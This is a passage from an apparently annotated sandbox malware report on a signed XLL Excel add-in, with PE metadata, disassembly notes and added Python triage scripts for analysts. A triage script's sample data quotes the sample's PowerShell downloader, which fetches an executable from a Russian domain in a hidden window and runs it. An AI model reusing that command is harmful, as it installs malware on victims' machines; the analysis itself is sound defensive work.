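The two transcripts above record the same downloader one-liner. Decoded, `-EX bYpASs -NOp -w 1` is `-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden` (powershell.exe accepts any unambiguous prefix of a parameter name, and 1 is the Hidden value of the ProcessWindowStyle enum); `WGeT` is the built-in alias for Invoke-WebRequest in Windows PowerShell 5.1; the file is fetched as `08.jpg` but written as `snd32sys.exe` under the world-writable `c:\Users\Public` and then launched with `sTart`. The Python below is an added triage example written for this page, not Joe Sandbox code and not the sample's, that runs those checks over the two Host Application lines copied from the transcripts. The parameter subset, rule names and severity thresholds are the example's own.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the two "Host Application" command lines recorded in the
# PowerShell transcripts of this report, copied verbatim (quotes and trailing space included).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHEll.eXE -EX bYpASs -NOp -w 1 "
    r"WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; "
    r"sTart 'c:\Users\Public\snd32sys.exe'",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EX bYpASs -NOp -w 1 "
    r"WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe",
]

# powershell.exe accepts any unambiguous prefix of a host parameter, so -EX, -NOp and -w
# mean -ExecutionPolicy, -NoProfile and -WindowStyle. This is a subset of the real list.
HOST_PARAMS = ["ExecutionPolicy", "EncodedCommand", "NoProfile", "NoLogo", "NoExit",
               "NonInteractive", "WindowStyle", "Command", "File", "Version", "Sta", "Mta"]
# -WindowStyle also accepts the ProcessWindowStyle enum value (0 Normal, 1 Hidden, ...).
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}
# Usual spellings, keyed lower-case, for the case-mangling check (WGeT, bYpASs, sTart).
KNOWN_WORDS = {"powershell.exe": "powershell.exe", "wget": "wget", "curl": "curl", "iwr": "iwr",
               "invoke-webrequest": "Invoke-WebRequest", "start": "start", "saps": "saps",
               "start-process": "Start-Process", "bypass": "Bypass", "unrestricted": "Unrestricted",
               "-outfile": "-OutFile"}
DOWNLOADERS = {"wget", "curl", "iwr", "invoke-webrequest"}
LAUNCHERS = {"start", "saps", "start-process"}
EXEC_EXTS = {"exe", "dll", "scr", "bat", "cmd", "ps1", "vbs", "js", "hta", "xll"}
WRITABLE_DROP_DIRS = (r"c:\users\public", r"\appdata\local\temp", r"c:\programdata")

TOKEN_RE = re.compile(r"""'([^']*)'|"([^"]*)"|([^\s;]+)|(;)""")

def tokenize(cmdline):
    """Split on whitespace and ';', keeping quoted strings whole and stripping their quotes."""
    tokens = []
    for sq, dq, bare, semi in TOKEN_RE.findall(cmdline):
        tokens.append(";" if semi else (sq or dq or bare).strip())
    return tokens

def resolve_param(token):
    """Expand a (possibly abbreviated) -Param token to its full host parameter name, or None."""
    hits = [p for p in HOST_PARAMS if p.lower().startswith(token[1:].lower())]
    return hits[0] if len(hits) == 1 else None

def case_mangled(token, canonical):
    """A known word written in neither its usual, all-lower nor all-upper form."""
    return token not in (canonical, token.lower(), token.upper())

def triage(cmdline):
    """Run every check over one command line and return the sorted finding names."""
    tokens = tokenize(cmdline)
    low = [t.lower() for t in tokens]
    findings, url, out = set(), None, None
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        word = tok.rsplit("\\", 1)[-1]                       # basename for ...\powershell.exe
        if word.lower() in KNOWN_WORDS and case_mangled(word, KNOWN_WORDS[word.lower()]):
            findings.add("case-mangled")
        if low[i] in DOWNLOADERS:
            findings.add("web-download-cmdlet")
        if low[i].startswith(("http://", "https://")):
            url = tok
        if not tok.startswith("-"):
            continue
        param = resolve_param(tok)
        if param:
            if len(tok) - 1 < len(param):
                findings.add("abbreviated-parameter")        # -EX, -NOp, -w
            if case_mangled(tok, "-" + param[: len(tok) - 1]):
                findings.add("case-mangled")
        if param == "ExecutionPolicy" and nxt.lower() in {"bypass", "unrestricted"}:
            findings.add("executionpolicy-bypass")
        elif param == "NoProfile":
            findings.add("noprofile")
        elif param == "WindowStyle" and WINDOW_STYLES.get(nxt, nxt).lower() == "hidden":
            findings.add("hidden-window")
        elif param == "EncodedCommand":
            findings.add("encoded-command")
        elif len(tok) > 2 and "outfile".startswith(tok[1:].lower()):
            out = nxt                                        # Invoke-WebRequest -OutFile <path>
    if url and out:
        path = urlparse(url).path
        url_ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        out_ext = out.rsplit(".", 1)[-1].lower() if "." in out else ""
        if url_ext != out_ext:
            findings.add("extension-mismatch")               # 08.jpg on the wire, .exe on disk
        if out_ext in EXEC_EXTS:
            findings.add("executable-written")
    if out:
        if any(d in out.lower() for d in WRITABLE_DROP_DIRS):
            findings.add("world-writable-drop-dir")
        if any(low[i] in LAUNCHERS and low[i + 1] == out.lower() for i in range(len(low) - 1)):
            findings.add("download-then-execute")
    return sorted(findings)

def verdict(findings):
    """Coarse severity: downloading an executable, or download followed by launch, is high."""
    f = set(findings)
    if "download-then-execute" in f or {"web-download-cmdlet", "executable-written"} <= f:
        return "high"
    if f & {"executionpolicy-bypass", "hidden-window", "encoded-command", "case-mangled"}:
        return "medium"
    return "low" if f else "clean"

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(verdict(triage(line)), triage(line))
```

The tokenizer keeps the first transcript's `'http://srand04rf.ru/08.jpg '` (trailing space inside the quotes) as one URL token, which is what makes the extension check fire there as well. The same function can be pointed at Sysmon event 1 command lines or 4104 script-block text; the abbreviated-parameter and case-mangling signals are the ones most likely to survive small changes to the lure.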

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):6.069104587121557
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                  File name:0708_5355150121.xll
                                                                                                                                                  File size:24488
                                                                                                                                                  MD5:41e0318dfdb1c180a375a7efc712649e
                                                                                                                                                  SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
                                                                                                                                                  SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
                                                                                                                                                  SHA512:b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
                                                                                                                                                  SSDEEP:384:Er7ozcN5pozcU7ZHW7pw0jGWdqFQv6HovAcdKhKAUgLysGpwKNsc8kYN5:ika52naz78+KKd81UgLJc8ks
                                                                                                                                                  File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......`...........!...I.....@......................................................9s....@.............................B..

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:80b6f2d2f6f6d2cc

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0xcd418fb
                                                                                                                                                  Entrypoint Section:.img
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0xcd40000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                  Time Stamp:0x60E5C2AB [Wed Jul 7 15:05:15 2021 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:1
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:1
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:8fc6d9b5f93578c52ec239ef6c29b5ac

                                                                                                                                                  Authenticode Signature

                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:-2146762495 (HRESULT 0x800B0101, CERT_E_EXPIRED)
Not Before / Not After:
• 6/8/2021 5:00:00 PM to 6/9/2022 4:59:59 PM
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=Storeks LLC, O=Storeks LLC, L=Moscow, C=RU
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:D8E818AC7AC0DB90212FAB404C566D4C
                                                                                                                                                  Thumbprint SHA-1:91319E6A55BF0EF68DB8AFB31845AB961356175F
                                                                                                                                                  Thumbprint SHA-256:127B54C50D77A329A145B0A5686E2214D2ED40482C0375D0DE278BA4A135DEDE
Serial:1E5EFA53A14599CC82F56F0790E20B17
Note: "Digitally signed: true" above only records that the PE carries an Authenticode signature block; with "Signature Valid: false" the signature gives no assurance about the file, and a code-signing certificate issued to a named company establishes who obtained the certificate, not that the file is benign.

Entrypoint Preview

Reading note (editor's decoding of the listed mnemonics, not part of the sandbox output): the first two lines, `mov eax, 1` and `retn 0Ch`, are a DllMain that returns TRUE immediately; `retn 0Ch` discards DllMain's three stack arguments. A real routine starts at `sub esp, 1254h`, and everything the disassembler prints after the following `call` is data, not code. Converted back to bytes, those mnemonics are the UTF-16 string "kernel32" (6B 00 65 00 72 00 6E 00 65 00 6C 00 33 00 32 00 00 00) and the ASCII strings "LoadLibraryW" (4C 6F 61 64 4C 69 62 72 61 72 79 57 00) and "GetProcAddress" (47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00), followed by a 26-byte string beginning "Expa" that runs past the end of the listing. Each ASCII name is preceded by `E8 0D 00 00 00`, `E8 0F 00 00 00` and `E8 1A 00 00 00` respectively, a `call` whose displacement equals the string length including its NUL: the call-over-string idiom of position-independent loaders, where the pushed "return address" is the string pointer handed to a GetProcAddress-style resolver. The `call` directly after `sub esp` is followed by the "kernel32" string in the same way, so it is presumably the same idiom applied to the module name. This is the mechanism behind the "Extensive use of GetProcAddress" and "dynamically determine API calls" signatures, and it means nothing of interest happens in DllMain: an XLL does its work in the exports Excel calls once the add-in is loaded (xlAutoOpen), so that export, not the entry point, is where a manual analysis should start.
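
Added example (Python written for this page; not Joe Sandbox output and not code from the sample): the listing that follows prints the bytes after the DllMain stub as instructions, but read back from the mnemonics they are API names, each preceded by a `call` whose displacement equals the string length, so that the call pushes the string's address as its "return address". The function below recovers such names from a code buffer, and a second check recognises the `mov eax, 1 ; retn 0Ch` stub. The input is a constructed byte string laid out like the listing; the three larger call displacements and the full spelling of the third name are assumptions, as commented.

```python
import string

NAME_CHARS = set(string.ascii_letters + string.digits + "_.-")

# Constructed sample laid out like this report's entry point listing: a DllMain that returns
# TRUE at once, then a routine that pushes each API name with a `call` over the string.
# Assumptions (not visible in the listing): the resolver displacements 2FBh/35Ah/33Eh point
# outside this buffer, and the third name is spelled out in full; the listing shows only a
# 26-byte string starting "Expa" there.
SAMPLE_CODE = (
    b"\xB8\x01\x00\x00\x00"                 # mov eax, 1        DllMain ...
    b"\xC2\x0C\x00"                         # retn 0Ch          ... returns TRUE, 3 args discarded
    b"\x81\xEC\x54\x12\x00\x00"             # sub esp, 1254h    loader routine begins
    b"\xE8\x12\x00\x00\x00"                 # call +12h         pushes &L"kernel32"
    + "kernel32".encode("utf-16-le") + b"\x00\x00"
    b"\xE8\xFB\x02\x00\x00"                 # call +2FBh        resolver (target outside buffer)
    b"\x89\xC3"                             # mov ebx, eax
    b"\xE8\x0D\x00\x00\x00" b"LoadLibraryW\x00"                 # call +0Dh over 13 bytes
    b"\x53" b"\xE8\x5A\x03\x00\x00" b"\x89\xC7"                  # push ebx / call +35Ah / mov edi, eax
    b"\xE8\x0F\x00\x00\x00" b"GetProcAddress\x00"               # call +0Fh over 15 bytes
    b"\x53" b"\xE8\x3E\x03\x00\x00" b"\x89\xC6"                  # push ebx / call +33Eh / mov esi, eax
    b"\xE8\x1A\x00\x00\x00" b"ExpandEnvironmentStringsA\x00"    # call +1Ah over 26 bytes (assumed name)
)

def dllmain_is_stub(code):
    """True when the entry point is `mov eax, 1 ; retn 0Ch`: DllMain returns TRUE without doing
    anything, so the DLL's real behaviour lives in its exports (xlAutoOpen for an XLL)."""
    return code[:8] == b"\xB8\x01\x00\x00\x00\xC2\x0C\x00"

def _decode_name(body):
    """NUL-terminated ASCII, or UTF-16LE with a double-NUL terminator, to str; else None."""
    if (len(body) % 2 == 0 and body[-2:] == b"\x00\x00" and not any(body[1::2])
            and body[:-2:2] and all(chr(b) in NAME_CHARS for b in body[:-2:2])):
        return body[:-2].decode("utf-16-le")
    if len(body) > 1 and body[-1] == 0 and all(chr(b) in NAME_CHARS for b in body[:-1]):
        return body[:-1].decode("ascii")
    return None

def find_call_over_strings(code, max_len=64):
    """Scan for `E8 rel32` followed by exactly rel32 bytes that form a NUL-terminated name.
    Returns [(offset_of_call, name)]. A genuine call elsewhere fails the test because its
    displacement is large or the bytes after it are not a printable string."""
    hits, i = [], 0
    while i + 5 <= len(code):
        if code[i] == 0xE8:
            rel = int.from_bytes(code[i + 1:i + 5], "little", signed=True)
            start, end = i + 5, i + 5 + rel
            if 2 <= rel <= max_len and end <= len(code):
                name = _decode_name(code[start:end])
                if name:
                    hits.append((i, name))
                    i = end             # resume after the string: its bytes are data, not code
                    continue
        i += 1
    return hits

def resolved_names(code):
    """Just the names, in the order the loader pushes them."""
    return [name for _, name in find_call_over_strings(code)]

if __name__ == "__main__":
    print("DllMain is a stub:", dllmain_is_stub(SAMPLE_CODE))
    for offset, name in find_call_over_strings(SAMPLE_CODE):
        print(f"  +{offset:04x}  {name}")
```

On a real file, run it over the bytes of the section that holds the entry point (here `.img`; the entry point RVA is 0xcd418fb - 0xcd40000 = 0x18fb) rather than the whole image, and treat the recovered names as the import table the static import hash (above) does not see.
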

                                                                                                                                                  Instruction
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  retn 000Ch
                                                                                                                                                  sub esp, 00001254h
                                                                                                                                                  call 00007FBDDC907867h
                                                                                                                                                  imul eax, dword ptr [eax], 65h
                                                                                                                                                  add byte ptr [edx+00h], dh
                                                                                                                                                  outsb
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  insb
                                                                                                                                                  add byte ptr [ebx], dh
                                                                                                                                                  add byte ptr [edx], dh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add al, ch
                                                                                                                                                  sti
                                                                                                                                                  add al, byte ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000DE8C3h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  dec esp
                                                                                                                                                  outsd
                                                                                                                                                  popad
                                                                                                                                                  dec esp
                                                                                                                                                  imul esp, dword ptr [edx+72h], 57797261h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  pop edx
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000FE8C7h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc edi
                                                                                                                                                  je 00007FBDDC9078A3h
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  arpl word ptr [ecx+64h], ax
                                                                                                                                                  jc 00007FBDDC9078B8h
                                                                                                                                                  jnc 00007FBDDC9078C5h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+001AE8C6h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebp
                                                                                                                                                  js 00007FBDDC9078C2h
                                                                                                                                                  popad
                                                                                                                                                  outsb
                                                                                                                                                  inc ebp
                                                                                                                                                  outsb
                                                                                                                                                  jbe 00007FBDDC9078BBh
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  outsb
                                                                                                                                                  insd
                                                                                                                                                  outsb
                                                                                                                                                  je 00007FBDDC9078A5h
                                                                                                                                                  je 00007FBDDC9078C4h
                                                                                                                                                  imul ebp, dword ptr [esi+67h], 53005773h
                                                                                                                                                  call esi
                                                                                                                                                  push 00000104h
                                                                                                                                                  lea edx, dword ptr [esp+00001010h]
                                                                                                                                                  push edx
                                                                                                                                                  call 00007FBDDC90787Bh
                                                                                                                                                  and eax, 55005000h
                                                                                                                                                  add byte ptr [edx+00h], al
                                                                                                                                                  dec esp
                                                                                                                                                  add byte ptr [ecx+00h], cl
                                                                                                                                                  inc ebx
                                                                                                                                                  add byte ptr [72005C00h], ah
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  jnc 00007FBDDC907852h
                                                                                                                                                  xor eax, dword ptr [eax]
                                                                                                                                                  xor al, byte ptr [eax]
                                                                                                                                                  add byte ptr [eax+00h], ch
                                                                                                                                                  je 00007FBDDC907852h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add bh, bh
                                                                                                                                                  shr al, 1
                                                                                                                                                  or al, 00h
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebx
                                                                                                                                                  jc 00007FBDDC9078B7h
popad

Note on the preview: most of the linear sweep above is string data, not code. The run dec esp / outsd / popad / dec esp / imul esp, dword ptr [edx+72h], 57797261h is the byte sequence 4C 6F 61 64 4C 69 62 72 61 72 79 57, i.e. the ASCII string LoadLibraryW; the inc edi ... jnc run is GetProcAddress and the inc ebp ... imul ebp run is ExpandEnvironmentStringsW. Each name sits directly after a call whose displacement equals the string length including its NUL (0x0D, 0x0F and 0x1A), the position-independent idiom that jumps over the string and leaves its address on the stack, and is followed by push ebx and a call, i.e. GetProcAddress(hModule, "name"). The push 104h / lea edx, [esp+1010h] / push edx / call sequence passes a MAX_PATH (0x104) stack buffer, and the bytes right after that call (and eax, 55005000h onwards) are a UTF-16 string beginning %PUBLIC%\, the source argument of ExpandEnvironmentStringsW. The APIs the loader actually needs are therefore resolved by name at run time and do not appear in the import table below.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x9000           0x42          .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1000           0xf05         .img
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x4600           0x19a8        n/a (file offset, not an RVA)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0x8           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

The Is in Section column is empty for IMAGE_DIRECTORY_ENTRY_SECURITY because, unlike every other entry, it holds a raw file offset: the attribute certificate table is never mapped. The section raw sizes listed below add up to 0x4200, so with the usual 0x400 bytes of headers (an assumption, the report does not list raw pointers) the 0x19a8-byte certificate blob at 0x4600 is appended directly after .reloc. Two other entries stand out: the import directory spans the entire executable section .img (its size 0xf05 equals that section's virtual size), and the IAT entry is zero.

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.img      0x1000           0xf05         0xe00     False     0.495256696429   data       5.15354590708    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.ico      0x2000           0x1000        0x1000    False     0.122802734375   data       1.29754900082    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fyjrtr   0x3000           0x1000        0x1000    False     0.566650390625   data       5.36518457685    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rytkrer  0x4000           0x1000        0x1000    False     0.767822265625   data       6.70050253557    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reyery   0x5000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.txt      0x6000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x7000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.res      0x8000           0x200         0x0       False     0                empty      0.0              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.edata    0x9000           0x42          0x200     False     0.103515625      data       0.543966493249   IMAGE_SCN_MEM_READ
.reloc    0xa000           0x8           0x200     False     0.03515625       data       0.0203931352361  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

None of the ten sections carries IMAGE_SCN_MEM_WRITE, so every run-time write into the mapped image has to be preceded by a page-protection change. The names .img, .ico, .fyjrtr, .rytkrer and .reyery are not ones any standard linker emits. .rytkrer has the highest entropy (6.70 bits per byte) and is the natural candidate for an encoded payload, while .reyery, .txt, .data and .res have no raw data at all (raw size 0, virtual size 0x200), which is what their IMAGE_SCN_CNT_UNINITIALIZED_DATA flag reflects.
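The fields in the Sections table (virtual address and size, raw size, entropy, characteristics) can be recomputed with a few lines of standard-library Python. The script below is an added example and is not part of the Joe Sandbox report: it parses a PE32 section table, computes per-section Shannon entropy, decodes the IMAGE_SCN_* flags and applies the three checks an analyst would run on the table above (non-standard section names, a section above 6.5 bits per byte, no writable section at all). The PE it runs on is constructed inside the script by build_sample_pe(); its section names and flags are copied from the table, but its contents are seeded pseudo-random filler, not bytes of the sample. The entropy threshold and the list of "common" section names are the example's own choices, not values from the report.

```python
"""Added example: static triage of a PE section table (stdlib only).
The image analysed here is built by build_sample_pe() and is NOT the .xll
from the report; only its section names and characteristics mirror it."""
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE               = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA   = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_DISCARDABLE        = 0x02000000
IMAGE_SCN_MEM_EXECUTE            = 0x20000000
IMAGE_SCN_MEM_READ               = 0x40000000
IMAGE_SCN_MEM_WRITE              = 0x80000000
FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_CNT_UNINITIALIZED_DATA: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    IMAGE_SCN_MEM_DISCARDABLE: "IMAGE_SCN_MEM_DISCARDABLE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
# Names the usual linkers emit (example's own list); .img/.ico/.fyjrtr/.rytkrer/.reyery are not among them.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                        ".pdata", ".bss", ".tls", ".CRT", ".textbss", ".gfids"}
HIGH_ENTROPY = 6.5   # bits/byte (example threshold); compressed or encrypted blobs sit above it, plain x86 below


def shannon_entropy(data):
    """Entropy in bits per byte, the same measure as the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(blob):
    """Walk DOS header -> PE signature -> COFF header -> section table and describe each section."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", blob, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", blob, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        (name, vsize, va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        data = blob[raw_ptr:raw_ptr + raw_size]  # raw data on disk, what the report's entropy is taken over
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "flags": [n for f, n in FLAG_NAMES.items() if chars & f],
            "entropy": shannon_entropy(data),
        })
    return sections


def triage(blob):
    """Rules an analyst applies to the Sections table; returns (sections, findings)."""
    sections = parse_sections(blob)
    findings = []
    for s in sections:
        if s["name"] not in COMMON_SECTION_NAMES:
            findings.append(f"{s['name']}: non-standard section name")
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"{s['name']}: high entropy {s['entropy']:.2f}, likely packed/encrypted payload")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: writable and executable (RWX)")
    if not any(s["characteristics"] & IMAGE_SCN_MEM_WRITE for s in sections):
        findings.append("no section is IMAGE_SCN_MEM_WRITE: any self-modification of the mapped image "
                        "(e.g. rewriting its own PE header) needs a page-protection change first")
    return sections, findings


def build_sample_pe(sections):
    """Assemble a minimal PE32 file: DOS stub, COFF + optional header, section table, raw data.
    sections: list of (name, characteristics, bytes). Constructed for this example only."""
    file_align, sect_align, headers_size = 0x200, 0x1000, 0x400
    headers, raw, va, ptr = b"", b"", sect_align, headers_size
    for name, chars, data in sections:
        raw_size = -(-len(data) // file_align) * file_align      # round up to file alignment
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               len(data), va, raw_size, ptr, 0, 0, 0, 0, chars)
        raw += data.ljust(raw_size, b"\0")
        va += max(-(-len(data) // sect_align), 1) * sect_align
        ptr += raw_size
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x2102)
    opt = struct.pack("<H", 0x10B).ljust(224, b"\0")                            # PE32 magic; rest unused here
    return (dos + coff + opt + headers).ljust(headers_size, b"\0") + raw


# Constructed sample: names/flags as in the report, contents are seeded pseudo-random filler.
_rng = random.Random(445958)
SAMPLE_PE = build_sample_pe([
    (".img", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ,
     bytes(_rng.randrange(64) for _ in range(0xE00))),                     # code-like, about 6 bits/byte
    (".ico", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, b"\0" * 0x1000),
    (".rytkrer", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ,
     bytes(_rng.randrange(256) for _ in range(0x1000))),                   # encrypted-looking, about 8 bits/byte
    (".reloc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ, b"\0" * 8),
])

if __name__ == "__main__":
    secs, notes = triage(SAMPLE_PE)
    for s in secs:
        print(f"{s['name']:<9}{s['virtual_address']:#08x} {s['virtual_size']:#07x} {s['raw_size']:#07x} "
              f"{s['entropy']:.3f}  {', '.join(s['flags'])}")
    print("\n".join(notes))
```

To run it on a real file replace SAMPLE_PE with open(path, "rb").read(); parse_sections() only needs the headers and section table, so it works on PE32+ as well (the optional-header size is read rather than assumed).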

Imports

DLL           Import
msvbvm60.dll  __vbaLateIdSt, __vbaBoolVar, rtcStringBstr, rtcRightTrimBstr, rtcEndOfFile, __vbaBoolVarNull, __vbaNextEachCollObj, rtcAbsVar, TipCreateInstanceEx, __vbaDerefAry1, __vbaFpUI1, rtcKillFiles, __vbaVarCmpLt, SetMemObj, __vbaForEachVar, BASIC_CLASS_QueryInterface, rtcEnvironBstr, EbLibraryLoad, Zombie_QueryInterface, rtR4FromErrVar, rtcMakeDir, VarPtr, PutMem2, rtcGetTimeValue, rtcPackDate, rtcCommandVar
